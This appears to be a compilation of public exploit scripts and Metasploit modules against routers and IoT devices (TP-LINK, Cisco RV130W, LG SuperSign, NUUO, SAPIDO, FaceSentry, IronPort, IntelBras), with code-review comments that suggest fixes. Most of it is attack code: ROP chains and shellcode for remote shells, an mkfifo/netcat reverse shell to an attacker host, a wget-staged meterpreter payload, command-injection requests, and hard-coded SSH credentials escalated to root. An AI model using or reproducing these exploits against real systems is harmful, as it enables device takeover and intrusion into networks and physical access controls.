# TP-LINK TL-WR940N/TL-WR941ND buffer overflow remote shell exploit
import requests
import md5
import base64
import string
import struct
import socket
password = md5.new('admin').hexdigest()
cookie = base64.b64encode('admin:'+password)
print '[+] Authorization cookie: ', cookie
print '[+] Login to generate user directory...'
#proxy = {'http':'127.0.0.1:8080'}
loginUrl = 'http://192.168.0.1/userRpm/LoginRpm.htm?Save=Save'
headers = {'cookie':'Authorization=Basic%20'+cookie.replace('=', '%3D')}
req = requests.get(loginUrl, headers=headers)
directory = ''
nop = "\x27\xE0\xFF\xFF"
shellcode = string.join([
"\x24\x0f\xff\xfa", # li t7,-6
"\x01\xe0\x78\x27", # nor t7,t7,zero
"\x21\xe4\xff\xfd", # addi a0,t7,-3
"\x21\xe5\xff\xfd", # addi a1,t7,-3
"\x28\x06\xff\xff", # slti a2,zero,-1
"\x24\x02\x10\x57", # li v0,4183
"\x01\x01\x01\x0c", # syscall 0x40404
"\xaf\xa2\xff\xff", # sw v0,-1(sp)
"\x8f\xa4\xff\xff", # lw a0,-1(sp)
"\x34\x0f\xff\xfd", # li t7,0xfffd
"\x01\xe0\x78\x27", # nor t7,t7,zero
"\xaf\xaf\xff\xe0", # sw t7,-32(sp)
"\x3c\x0e\x1f\x90", # lui t6,0x1f90
"\x35\xce\x1f\x90", # ori t6,t6,0x1f90
"\xaf\xae\xff\xe4", # sw t6,-28(sp)
# Big endian IP address 172.28.128.4
"\x3c\x0e\xc0\xA8" # lui t6,0x7f01
#"\xac\x1c\x80\x04", # lui t6,0x7f01
"\x35\xce\x01\x64", # ori t6,t6,0x101
"\xaf\xae\xff\xe6", # sw t6,-26(sp)
"\x27\xa5\xff\xe2", # addiu a1,sp,-30
"\x24\x0c\xff\xef", # li t4,-17
"\x01\x80\x30\x27", # nor a2,t4,zero
"\x24\x02\x10\x4a", # li v0,4170
"\x01\x01\x01\x0c", # syscall 0x40404
"\x24\x0f\xff\xfd", # li t7,-3
"\x01\xe0\x78\x27", # nor t7,t7,zero
"\x8f\xa4\xff\xff", # lw a0,-1(sp)
"\x01\xe0\x28\x21", # move a1,t7
"\x24\x02\x0f\xdf", # li v0,4063
"\x01\x01\x01\x0c", # syscall 0x40404
"\x24\x10\xff\xff", # li s0,-1
"\x21\xef\xff\xff", # addi t7,t7,-1
"\x15\xf0\xff\xfa", # bne t7,s0,68 <dup2_loop>
"\x28\x06\xff\xff", # slti a2,zero,-1
"\x3c\x0f\x2f\x2f", # lui t7,0x2f2f
"\x35\xef\x62\x69", # ori t7,t7,0x6269
"\xaf\xaf\xff\xec", # sw t7,-20(sp)
"\x3c\x0e\x6e\x2f", # lui t6,0x6e2f
"\x35\xce\x73\x68", # ori t6,t6,0x7368
"\xaf\xae\xff\xf0", # sw t6,-16(sp)
"\xaf\xa0\xff\xf4", # sw zero,-12(sp)
"\x27\xa4\xff\xec", # addiu a0,sp,-20
"\xaf\xa4\xff\xf8", # sw a0,-8(sp)
"\xaf\xa0\xff\xfc", # sw zero,-4(sp)
"\x27\xa5\xff\xf8", # addiu a1,sp,-8
"\x24\x02\x0f\xab", # li v0,4011
"\x01\x01\x01\x0c" # syscall 0x40404
], '')
libcBase= 0x77f53000
sleep = libcBase + 0x53CA0
gadget1 = libcBase + 0x00055c60 # addiu $a0, $zero, 1; move $t9, $s1; jalr $t9;
gadget2 = libcBase + 0x00024ecc #lw $ra, 0x2c($sp); lw $s1, 0x28($sp); lw $s0, 0x24($sp); jr $ra;
gadget3 = libcBase + 0x0001e20c # move $t9, $s1; lw $ra, 0x24($sp); lw $s2, 0x20($sp); lw $s1, 0x1c($sp); lw $s0, 0x18($sp); jr $t9
gadget4 = libcBase + 0x000195f4 #addiu $s0, $sp, 0x24; move $a0, $s0; move $t9, $s1; jalr $t9;
gadget5 = libcBase + 0x000154d8 # #move $t9, $s0; jalr $t9;
print "[+] First gadget address: ", hex(gadget1)
print "[+] Second gadget address: ", hex(gadget2)
print "[+] Third gadget address: ", hex(gadget3)
print "[+] Fourth gadget address: ", hex(gadget4)
print "[+] Fifth gadget address: ", hex(gadget4)
print "[+] Sleep function address: ", hex(sleep)
payload = "A"*160
s0 = "BBBB"
s1 = gadget2
payload += s0
payload += struct.pack('>I', s1)
payload += struct.pack('>I', gadget1) #Overwrite RA address
#New stack for gadget 2 starts
payload += "E" * 20 # adjust stack
payload += "FFFF" #gadget3 -> lw $s0, 0x18($sp) => 24 bytes
payload += "GGGG" #gadget3 -> lw $s1, 0x1c($sp) => 28 bytes
payload += "HHHH" #gadget3 -> lw $s2, 0x20($sp) => 32 bytes
payload += "AAAA"
payload += "CCCC"
payload += struct.pack('>I', sleep) #gadget2 -> lw $s1, 0x28($sp) => 40 bytes
payload += struct.pack('>I', gadget3) #gadget2 -> lw $ra, 0x2c($sp) => 44 bytes
#New stack for gadget 3 starts
payload += "G" *24
payload += "A"* 4 #lw $s0, 0x18($sp); sp + 24 bytes = s0
payload += struct.pack('>I', gadget5)#lw $s1, 0x1c($sp); sp + 28 bytes = s1 <= load gadget 5 addr
payload += "C" *4 #lw $s2, 0x20($sp); sp + 32 bytes = s2
payload += struct.pack('>I', gadget4) #lw $ra, 0x24($sp); sp + 36 bytes = ra <= load gadget 4 addr
#New stack for gadget 4 starts
payload += nop * 32
payload += shellcode #addiu $s0, $sp, 0x24; sp + 36 bytes = s0
if(req.status_code):
directory = req.text.split('=')[2].split('/')[3]
print '[+] Retrieved folder name: ', directory
req.close()
referer ='http://192.168.0.1/{0}/userRpm/DiagnosticRpm.htm'.format(directory)
host = '192.168.0.1'
port = 80
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
print "[*] Connected, sending payload {0} bytes...".format(len(payload))
pingUrl = '{1}/userRpm/PingIframeRpm.htm'.format(host,directory)
pingUrl += '?ping_addr='+payload+'&doType=ping&isNew=new&sendNum=4&psize=64&overTime=800&trHops=20'
auth = 'Authorization=Basic%20'+cookie.replace('=', '%3D')
pingReq = "GET /{0} HTTP/1.1\r\nHost: {1}\r\nReferer: {2}\r\ncookie: {3}\r\n\r\n".format(pingUrl, host, referer, auth)
print "[+] Exploit request: {0}".format(pingReq)
s.send(pingReq)
s.recv(4096)
s.close()
else:
req.close()
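Review bot: the shellcode comments are stale. `# Big endian IP address 172.28.128.4` and the `lui t6,0x7f01` / `ori t6,t6,0x101` annotations do not describe the bytes that follow (`\xc0\xA8` and `\x01\x64`), and the commented-out `#"\xac\x1c\x80\x04"` line should be removed rather than left beside them; anyone checking the assembly against the comments will be misled. `"\x3c\x0e\xc0\xA8"` is also missing its trailing comma, so Python silently concatenates it with the next literal (harmless here only because `string.join` joins everything anyway, but it breaks the one-instruction-per-element layout). `print "[+] Fifth gadget address: ", hex(gadget4)` prints `gadget4` where `gadget5` is meant. The `md5` module and `string.join` are Python 2 only.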

149
exploits/hardware/remote/46705.rb Executable file
@ -0,0 +1,149 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# linux/armle/meterpreter/bind_tcp -> segfault
# linux/armle/meterpreter/reverse_tcp -> segfault
# linux/armle/meterpreter_reverse_http -> works
# linux/armle/meterpreter_reverse_https -> works
# linux/armle/meterpreter_reverse_tcp -> works
# linux/armle/shell/bind_tcp -> segfault
# linux/armle/shell/reverse_tcp -> segfault
# linux/armle/shell_bind_tcp -> segfault
# linux/armle/shell_reverse_tcp -> segfault
#
class MetasploitModule < Msf::Exploit::Remote
Rank = GoodRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager
def initialize(info = {})
super(update_info(info,
'Name' => 'Cisco RV130W Routers Management Interface Remote Command Execution',
'Description' => %q{
A vulnerability in the web-based management interface of the Cisco RV130W Wireless-N Multifunction VPN Router
could allow an unauthenticated, remote attacker to execute arbitrary code on an affected device.
The vulnerability is due to improper validation of user-supplied data in the web-based management interface.
An attacker could exploit this vulnerability by sending malicious HTTP requests to a targeted device.
A successful exploit could allow the attacker to execute arbitrary code on the underlying operating
system of the affected device as a high-privilege user.
RV130W Wireless-N Multifunction VPN Router versions prior to 1.0.3.45 are affected.
Note: successful exploitation may not result in a session, and as such,
on_new_session will never repair the HTTP server, leading to a denial-of-service condition.
},
'Author' =>
[
'Yu Zhang', # Initial discovery
'Haoliang Lu', # Initial discovery
'T. Shiomitsu', # Initial discovery
'Quentin Kaiser <kaiserquentin@gmail.com>' # Vulnerability analysis & exploit dev
],
'License' => MSF_LICENSE,
'Platform' => %w[linux],
'Arch' => [ARCH_ARMLE],
'SessionTypes' => %w[meterpreter],
'CmdStagerFlavor' => %w{ wget },
'Privileged' => true, # BusyBox
'References' =>
[
['CVE', '2019-1663'],
['BID', '107185'],
['URL', 'https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190227-rmi-cmd-ex'],
],
'DefaultOptions' => {
'WfsDelay' => 10,
'SSL' => true,
'RPORT' => 443,
'CMDSTAGER::FLAVOR' => 'wget',
'PAYLOAD' => 'linux/armle/meterpreter_reverse_tcp',
},
'Targets' =>
[
[ 'Cisco RV130/RV130W < 1.0.3.45',
{
'offset' => 446,
'libc_base_addr' => 0x357fb000,
'system_offset' => 0x0004d144,
'gadget1' => 0x00020e79, # pop {r2, r6, pc};
'gadget2' => 0x00041308, # mov r0, sp; blx r2;
'Arch' => ARCH_ARMLE,
}
],
],
'DisclosureDate' => 'Feb 27 2019',
'DefaultTarget' => 0,
'Notes' => {
'Stability' => [ CRASH_SERVICE_DOWN, ],
},
))
end
def p(offset)
[(target['libc_base_addr'] + offset).to_s(16)].pack('H*').reverse
end
def prepare_shellcode(cmd)
#All these gadgets are from /lib/libc.so.0
shellcode = rand_text_alpha(target['offset']) + # filler
p(target['gadget1']) +
p(target['system_offset']) + # r2
rand_text_alpha(4) + # r6
p(target['gadget2']) + # pc
cmd
shellcode
end
def send_request(buffer)
begin
send_request_cgi({
'uri' => '/login.cgi',
'method' => 'POST',
'vars_post' => {
"submit_button": "login",
"submit_type": "",
"gui_action": "",
"wait_time": 0,
"change_action": "",
"enc": 1,
"user": rand_text_alpha_lower(5),
"pwd": buffer,
"sel_lang": "EN"
}
})
rescue ::Rex::ConnectionError
fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the router")
end
end
def exploit
print_status('Sending request')
execute_cmdstager
end
def execute_command(cmd, opts = {})
shellcode = prepare_shellcode(cmd.to_s)
send_request(shellcode)
end
def on_new_session(session)
# Given there is no process continuation here, the httpd server will stop
# functioning properly and we need to take care of proper restart
# ourselves.
print_status("Reloading httpd service")
reload_httpd_service = "killall httpd && cd /www && httpd && httpd -S"
if session.type.to_s.eql? 'meterpreter'
session.core.use 'stdapi' unless session.ext.aliases.include? 'stdapi'
session.sys.process.execute '/bin/sh', "-c \"#{reload_httpd_service}\""
else
session.shell_command(reload_httpd_service)
end
ensure
super
end
end
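Review bot: `p(offset)` builds the little-endian address via `.to_s(16)` and `pack('H*').reverse`, which is only correct when the hex string has an even number of digits; for any sum below 0x10000000 the seven-digit string is nibble-shifted by `H*` and the address is corrupted. `[target['libc_base_addr'] + offset].pack('V')` yields the same 4-byte little-endian value directly and is the framework idiom. The comment block above the class recording which payloads segfault and which work is useful information that belongs in `Notes` or `Description` rather than in a loose header comment, and the `Notes` `Stability` entry should mention that `on_new_session` restarts httpd only when a session is actually obtained, as the description already warns.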

@ -0,0 +1,72 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
include Msf::Exploit::Remote::HttpClient
def initialize(info={})
super(update_info(info,
'Name' => 'LG Supersign EZ CMS RCE',
'Description' => %q{
LG SuperSignEZ CMS, that many LG SuperSign TVs have builtin, is prone
to remote code execution due to an improper parameter handling
},
'Author' => ['Alejandro Fanjul'],
'References' =>
[
[ 'CVE', '2018-17173' ],
[ 'URL', 'https://mamaquieroserpentester.blogspot.com/2018/09/lg-supersign-rce-to-luna-and-back-to.html']
],
'License' => MSF_LICENSE,
'Platform' => 'unix',
'Privileged' => false,
'DefaultOptions' =>
{
'PAYLOAD' => 'cmd/unix/reverse_netcat'
},
'Arch' => ARCH_CMD,
'Payload' =>
{
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'netcat'
}
},
'Targets' =>
[
[ 'Automatic Target', {}]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Sep 21 2018'
)
)
register_options(
[
OptString.new('RPORT',[true,'Target port','9080'])
], self.class)
end
def exploit
lhost=datastore['LHOST']
lport=datastore['LPORT']
#uri = target_uri.path
cmd = Rex::Text.uri_encode(payload.encoded)
connect
res = send_request_raw({
'method'=>'GET',
'uri'=>"/qsr_server/device/getThumbnail?sourceUri='%20-;rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fsh%20-i%202%3E%261%7Cnc%20"+lhost+"%20"+lport.to_s+"%20%3E%2Ftmp%2Ff;'&targetUri=%2Ftmp%2Fthumb%2Ftest.jpg&mediaType=image&targetWidth=400&targetHeight=400&scaleType=crop&_=1537275717150"
})
handler
disconnect
end
end
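Review bot: `cmd = Rex::Text.uri_encode(payload.encoded)` is assigned and never used; the request URI embeds a fixed `mkfifo`/`nc` reverse-shell chain built from `lhost` and `lport`, so the `Payload` compat block and the `PAYLOAD` default are misleading and the description should state that the executed command is fixed and only LHOST/LPORT are honoured. Also `OptString.new('RPORT',[true,'Target port','9080'])` should be `Opt::RPORT(9080)` (it is a port, not a string) and the `self.class` argument to `register_options` is deprecated; the explicit `connect`/`disconnect` around `send_request_raw` is redundant because `HttpClient` manages the connection itself.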


@ -0,0 +1,89 @@
#!/usr/bin/python
# Exploit Title: NUUO NVRMini2 3.9.1 'sscanf' stack overflow
# Google Dork: n/a
# Date: Advisory Published: Nov 18
# Exploit Author: @0x00string
# Vendor Homepage: nuuo.com
# Software Link: https://www.nuuo.com/ProductNode.php?node=2
# Version: 3.9.1 and prior
# Tested on: 3.9.1
# CVE : CVE-2018-19864
#
# [ leading / ]
# [ Padding x 335 ]
# [ original value at stack pointer + 158 ]
# [ padding x 80 ]
# [ address of (pop {r3,lr} ; bx lr) ]
# [ system() address ]
# [ address of (mov r0,sp ; blx r3) ]
# [ command to execute ]
def banner():
print '''
@0x00string
0000000000000
0000000000000000000 00
00000000000000000000000000000
0000000000000000000000000000000
000000000 0000000000
00000000 0000000000
0000000 000000000000
0000000 000000000000000
000000 000000000 000000
0000000 000000000 000000
000000 000000000 000000
000000 000000000 000000
000000 00000000 000000
000000 000000000 000000
0000000 000000000 0000000
000000 000000000 000000
0000000000000000 0000000
0000000000000 0000000
00000000000 00000000
00000000000 000000000
0000000000000000000000000000000
00000000000000000000000000000
000 0000000000000000000
0000000000000
https://github.com/0x00string/oldays/blob/master/CVE-2018-19864.py
'''
def usage ():
print ("python script.py <args>\n"
" -h, --help: Show this message\n"
" -a, --rhost: Target IP address\n"
" -b, --rport: Target Port - default 5150\n"
" -c, --command: Command to execute\n"
"\n"
"Example:\n"
"python script.py -a 10.10.10.10\n"
"python script.py -a 10.10.10.10 -b 1234 -c reboot\n")
exit()
def main():
rhost = None;
rport = "5150";
command = "{/bin/touch,/tmp/hax}"
banner()
options, remainder = getopt.getopt(sys.argv[1:], 'a:b:c:fh', ['rhost=','rport=','command=','help'])
for opt, arg in options:
if opt in ('-h', '--help'):
usage()
elif opt in ('-a','--rhost'):
rhost = arg;
elif opt in ('-b','--rport'):
rport = arg;
elif opt in ('-c','--command'):
command = arg;
print ("Sending exploit to execute [" + command + "]\n")
buf = "GET /" + ("Z" * 335) + "\x30\x2a\x17\x45" + ("Y" * 80) + "\x08\xfc\x78\x40" +
"\x44\xe0\x17\x40" + "\xcc\xb7\x77\x40" + command + " HTTP/1.1\r\nHost: " +
"http://" + rhost + ":" + rport + "\r\n\r\n"
sock = socket(AF_INET, SOCK_STREAM)
sock.settimeout(30)
sock.connect((target_ip,int(target_port)))
sock.send(buf)
print ("done\n")
if __name__ == "__main__":
main()
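Review bot: the script does not run as written: `socket`, `getopt` and `sys` are used but never imported; the three-line `buf = "GET /" + ...` expression has neither parentheses nor backslash continuation, which is a SyntaxError; and `sock.connect((target_ip,int(target_port)))` references names that are never defined while the parsed values live in `rhost`/`rport`. `rhost` also defaults to `None` with no check, so omitting `-a` fails with a TypeError instead of `usage()`. The `print '''` banner is Python 2 syntax, so the header should state the interpreter version the shebang is expected to resolve to.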


@ -0,0 +1,68 @@
#!/usr/bin/python
# Exploit Title: Cisco RV130W Remote Stack Overflow
# Google Dork: n/a
# Date: Advisory Published: Feb 2019
# Exploit Author: @0x00string
# Vendor Homepage: cisco.com
# Software Link: https://www.cisco.com/c/en/us/products/routers/rv130w-wireless-n-multifunction-vpn-router/index.html
# Version: 1.0.3.44 and prior
# Tested on: 1.0.3.44
# CVE : CVE-2019-1663
#
# 0x357fc000 - libc base addr
# 0x35849144 - system() addr
#
# 0x0002eaf8 / 0x3582AAF8: pop {r4, r5, lr}; add sp, sp, #8; bx lr;
# 0x0000c11c / 0x3580811C: mov r2, r4; mov r0, r2; pop {r4, r5, r7, pc};
# 0x00041308 / 0x3583D308: mov r0, sp; blx r2;
#
# gadget 1 system() junk gadget 2 junk junk junk junk junk gadget 3 text
# [0x3582AAF8][0x35849144][AAAA][0x3580811C][BBBB][CCCC][DDDD][EEEE][FFFF][0x3583D308][command]
#
# curl -k -X 'POST' --data "submit_button=login&submit_type=&gui_action=&default_login=1&wait_time=0&change_action=&enc=1&user=cisco&pwd=UUUUZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZVVVVWWWWXXXXYYYY`printf "\xf8\xaa\x82\x35\x44\x91\x84\x35AAAA\x1c\x81\x80\x35BBBBCCCCDDDDEEEEFFFF\x08\xd3\x83\x35ping 192.168.1.100\x00"`&sel_lang=EN" 'https://192.168.1.1:443/login.cgi'
#!/usr/bin/python
import requests
def banner():
print '''
@0x00string
0000000000000
0000000000000000000 00
00000000000000000000000000000
0000000000000000000000000000000
000000000 0000000000
00000000 0000000000
0000000 000000000000
0000000 000000000000000
000000 000000000 000000
0000000 000000000 000000
000000 000000000 000000
000000 000000000 000000
000000 00000000 000000
000000 000000000 000000
0000000 000000000 0000000
000000 000000000 000000
0000000000000000 0000000
0000000000000 0000000
00000000000 00000000
00000000000 000000000
0000000000000000000000000000000
00000000000000000000000000000
000 0000000000000000000
0000000000000
https://github.com/0x00string/oldays/blob/master/CVE-2019-1663.py
'''
def main():
banner()
command = "ping 192.168.1.100\x00"
print ("Sending exploit to execute [" + command + "]\n")
rop = "\xf8\xaa\x82\x35"+"\x44\x91\x84\x35"+"AAAA"+"\x1c\x81\x80\x35"+"BBBB"+"CCCC"+"DDDD"+"EEEE"+"FFFF"+"\x08\xd3\x83\x35"
payload = ("Z" * 446) + rop + command
url = "https://192.168.1.100:443/login.cgi"
data = {'submit_button': 'login','submit_type': '','gui_action': '','default_login': '1','wait_time': '0','change_action': '','enc': '1','user': 'cisco','pwd': payload,'sel_lang': 'EN'}
r = requests.post(url, payload=data)
if __name__ == "__main__":
main()
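Review bot: the file carries a second `#!/usr/bin/python` shebang after the comment header; only the first line should have one. `requests.post(url, payload=data)` passes a keyword that `requests.post` does not accept, so the call raises a TypeError before any request is sent. The target URL (`https://192.168.1.100:443/login.cgi`) and the `ping 192.168.1.100` command are hard-coded rather than taken from arguments, and the `print (...)` calls with the `print '''` banner mix Python 2 syntax, so the interpreter version should be stated in the header.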


@ -0,0 +1,22 @@
# Exploit Title: SAPIDO RB-1732 command line execution
# Date: 2019-6-24
# Exploit Author: k1nm3n.aotoi
# Vendor Homepage: http://www.sapido.com.tw/
# Software Link: http://www.sapido.com.tw/CH/data/Download/firmware/rb1732/tc/RB-1732_TC_v2.0.43.bin
# Version: RB-1732 V2.0.43
# Tested on: linux
import requests
import sys
def test_httpcommand(ip, command):
my_data = {'sysCmd': command, 'apply': 'Apply', 'submit-url':'/syscmd.asp', 'msg':''}
r = requests.post('http://%s/goform/formSysCmd' % ip, data = my_data)
content = r.text
content = content[
content.find('<textarea rows="15" name="msg" cols="80" wrap="virtual">')+56:
content.rfind('</textarea>')]
return content
print test_httpcommand(sys.argv[1], " ".join(sys.argv[2:]))
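Review bot: the header gives no description of the vulnerability: it should say that `/goform/formSysCmd` runs the `sysCmd` form field and whether the endpoint requires authentication (the request sends no credentials or cookie), and carry a CVE if one was assigned. The magic `+56` is the length of the `<textarea rows="15" name="msg" cols="80" wrap="virtual">` marker; deriving it from the marker string with `len(...)` would document the intent and survive a tag change. There is no argument check, so running with no arguments raises IndexError on `sys.argv[1]`, and `print test_httpcommand(...)` is Python 2 syntax.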

exploits/hardware/remote/47067.py Executable file

@ -0,0 +1,108 @@
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
#
# FaceSentry Access Control System 6.4.8 Remote SSH Root Access Exploit
#
#
# Vendor: iWT Ltd.
# Product web page: http://www.iwt.com.hk
# Affected version: Firmware 6.4.8 build 264 (Algorithm A16)
# Firmware 5.7.2 build 568 (Algorithm A14)
# Firmware 5.7.0 build 539 (Algorithm A14)
#
# Summary: FaceSentry 5AN is a revolutionary smart identity
# management appliance that offers entry via biometric face
# identification, contactless smart card, staff ID, or QR-code.
# The QR-code upgrade allows you to share an eKey with guests
# while you're away from your Office and monitor all activity
# via the web administration tool. Powered by standard PoE
# (Power over Ethernet), FaceSEntry 5AN can be installed in
# minutes with only 6 screws. FaceSentry 5AN is a true enterprise
# grade access control or time-and-attendance appliance.
#
# Desc: FaceSentry facial biometric access control appliance
# ships with hard-coded and weak credentials for SSH access
# on port 23445 using the credentials wwwuser:123456. The root
# privilege escalation is done by abusing the insecure sudoers
# entry file.
#
# ================================================================
# lqwrm@metalgear:~$ python ssh_root.py 192.168.11.1
# [+] Connecting to 192.168.11.1 on port 23445: Done
# [*] wwwuser@192.168.11.1:
# Distro Ubuntu 16.04
# OS: linux
# Arch: Unknown
# Version: 4.10.0
# ASLR: Enabled
# Note: Susceptible to ASLR ulimit trick (CVE-2016-3672)
# [+] Opening new channel: 'shell': Done
# [*] Switching to interactive mode
# wwwuser@TWR01:~$ pwd
# /home/wwwuser
# wwwuser@TWR01:~$ sudo -l
# Matching Defaults entries for wwwuser on localhost:
# env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
#
# User wwwuser may run the following commands on localhost:
# (root) NOPASSWD: /sbin/service, PROCESSES, NETWORKING, REBOOT, IPTABLES, /faceGuard/bin/*, /faceGuard/database/Restore*, /bin/date, /bin/cat, /bin/echo, /faceGuard/bin/phpbin/*, /bin/sed, /sbin/*, /usr/sbin/*, /bin/*, /usr/bin/*
# wwwuser@TWR01:~$ sudo cat /etc/sudoers.d/sudoers.sentry
# Cmnd_Alias SENTRY = /faceGuard/bin/*
# Cmnd_Alias SENTRY_DB_RESTORE = /faceGuard/database/Restore*
# Cmnd_Alias DATE = /bin/date
# Cmnd_Alias CAT = /bin/cat
# Cmnd_Alias ECHO = /bin/echo
# Cmnd_Alias PRINTING = /usr/sbin/lpc, /usr/bin/lprm
# Cmnd_Alias SENTRYWEB = /faceGuard/bin/phpbin/*
# Cmnd_Alias SED = /bin/sed
# Cmnd_Alias SERVICES = /sbin/service
# Cmnd_Alias SBIN = /sbin/*, /usr/sbin/*
# Cmnd_Alias BIN = /bin/*, /usr/bin/*
#
# wwwuser ALL=NOPASSWD: SERVICES, PROCESSES, NETWORKING, REBOOT, IPTABLES, SENTRY, SENTRY_DB_RESTORE, DATE, CAT, ECHO, SENTRYWEB, SED, SBIN, BIN
# iwtuser ALL=NOPASSWD: SERVICES, PROCESSES, NETWORKING, REBOOT, IPTABLES, SENTRY, SENTRY_DB_RESTORE, DATE, CAT, ECHO, SENTRYWEB, SED, SBIN, BIN
# wwwuser@TWR01:~$ id
# uid=1001(wwwuser) gid=1001(wwwuser) groups=1001(wwwuser),27(sudo)
# wwwuser@TWR01:~$ sudo su
# root@TWR01:/home/wwwuser# id
# uid=0(root) gid=0(root) groups=0(root)
# root@TWR01:/home/wwwuser# exit
# exit
# wwwuser@TWR01:~$ exit
# logout
# [*] Got EOF while reading in interactive
# [*] Closed SSH channel with 192.168.11.1
# lqwrm@metalgear:~$
# ================================================================
#
# Tested on: Linux 4.14.18-sunxi (armv7l) Ubuntu 16.04.4 LTS (Xenial Xerus)
# Linux 3.4.113-sun8i (armv7l)
# PHP/7.0.30-0ubuntu0.16.04.1
# PHP/7.0.22-0ubuntu0.16.04.1
# lighttpd/1.4.35
# Armbian 5.38
# Sunxi Linux (sun8i generation)
# Orange Pi PC +
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# @zeroscience
#
#
# Advisory ID: ZSL-2019-5526
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5526.php
#
#
# 28.05.2019
#
from pwn import *
if len(sys.argv) < 2:
print 'Usage: ./fs.py <ip>\n'
sys.exit()
ip = sys.argv[1]
rshell = ssh('wwwuser', ip, password='123456', port=23445)
rshell.interactive()
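Review bot: `sys` is only reachable through pwntools' `from pwn import *`; import it explicitly so the usage check does not depend on a re-export. The header describes two issues, hard-coded `wwwuser:123456` SSH credentials on port 23445 and an over-broad sudoers file that grants `NOPASSWD` for `/bin/*`, `/sbin/*`, `/usr/bin/*`, but the script only demonstrates the first; the root step appears solely in the transcript, which the header should say. `print 'Usage: ./fs.py <ip>\n'` is Python 2 syntax under a bare `#!/usr/bin/env python` shebang, so the expected interpreter version belongs in the header.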


@ -0,0 +1,51 @@
#!/usr/bin/perl -w
#
#
# Cisco (Titsco) Email Security Appliance (IronPort) C160 Header 'Host' Injection
#
#
# Copyright 2019 (c) Todor Donev <todor.donev at gmail.com>
#
#
# Disclaimer:
# This or previous programs are for Educational purpose ONLY. Do not use it without permission.
# The usual disclaimer applies, especially the fact that Todor Donev is not liable for any damages
# caused by direct or indirect use of the information or functionality provided by these programs.
# The author or any Internet provider bears NO responsibility for content or misuse of these programs
# or any derivatives thereof. By using these programs you accept the fact that any damage (dataloss,
# system crash, system compromise, etc.) caused by the use of these programs are not Todor Donev's
# responsibility.
#
# Use them at your own risk!
#
#
use strict;
use HTTP::Request;
use LWP::UserAgent;
use WWW::UserAgent::Random;
use HTTP::CookieJar::LWP;
my $host = shift || 'https://192.168.1.1:443/';
print ("[+] Cisco (Titsco) Email Security Appliance (IronPort) C160 Header 'Host' Injection\n");
print ("===================================================================================\n");
print ("[!] Author: Todor Donev <todor.donev\@gmail.com>\n");
print ("[?] e.g. perl $0 https://target:port/\n") and exit if ($host !~ m/^http/);
my $user_agent = rand_ua("browsers");
my $jar = HTTP::CookieJar::LWP->new();
my $browser = LWP::UserAgent->new(
protocols_allowed => ['http', 'https'],
ssl_opts => { verify_hostname => 0 }
);
$browser->timeout(10);
$browser->cookie_jar($jar);
$browser->agent($user_agent);
my $request = HTTP::Request->new (POST => $host,
[ Content_Type => "application/x-www-form-urlencoded" ,
Referer => $host], " ");
$request->header("Host" => "Header-Injection");
my $content = $browser->request($request);
print $content->headers_as_string();
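Review bot: the header says nothing about what the Host header injection achieves or where the injected value is reflected; the script sends `Host: Header-Injection` and prints `$content->headers_as_string()`, leaving the reader to spot the reflection by eye, so a line of expected output naming the response header that echoes the value, or a check of the response for the string, would make the result verifiable. The script also depends on the non-core modules `WWW::UserAgent::Random` and `HTTP::CookieJar::LWP` without saying so, and `HTTP::Request->new (POST => $host, [...], " ")` sends a one-space body for no stated reason.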

exploits/hardware/remote/47337.pl Executable file

@ -0,0 +1,102 @@
#!/usr/bin/perl -w
#
# IntelBras TELEFONE IP TIP200/200 LITE 60.61.75.15 'dumpConfigFile' Pre-Auth Remote Arbitrary File Read
#
# Todor Donev 2019 (c) <todor.donev at gmail.com>
#
#
# Disclaimer:
# This or previous programs are for Educational purpose ONLY. Do not use it without permission.
# The usual disclaimer applies, especially the fact that Todor Donev is not liable for any damages
# caused by direct or indirect use of the information or functionality provided by these programs.
# The author or any Internet provider bears NO responsibility for content or misuse of these programs
# or any derivatives thereof. By using these programs you accept the fact that any damage (dataloss,
# system crash, system compromise, etc.) caused by the use of these programs are not Todor Donev's
# responsibility.
#
# Use them at your own risk!
#
# [test@localhost intelbras]$ perl intelbras_telefone_ip_tip_200_200_lite.pl
#
# # IntelBras TELEFONE IP TIP200/200 LITE 60.61.75.15 'dumpConfigFile' Pre-Auth Remote Arbitrary File Read
# # ========================================================================================================
# # Author: Todor Donev 2019 (c) <todor.donev at gmail.com>
# # ========================================================================================================
# # > Authorization => Basic dXNlcjp1c2Vy
# # > User-Agent => Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)
# # > Content-Type => application/x-www-form-urlencoded
# # < Accept-Ranges => bytes
# # < Server => SIPPhone
# # < Content-Type => text/html;charset=UTF-8
# # < Expires => -1
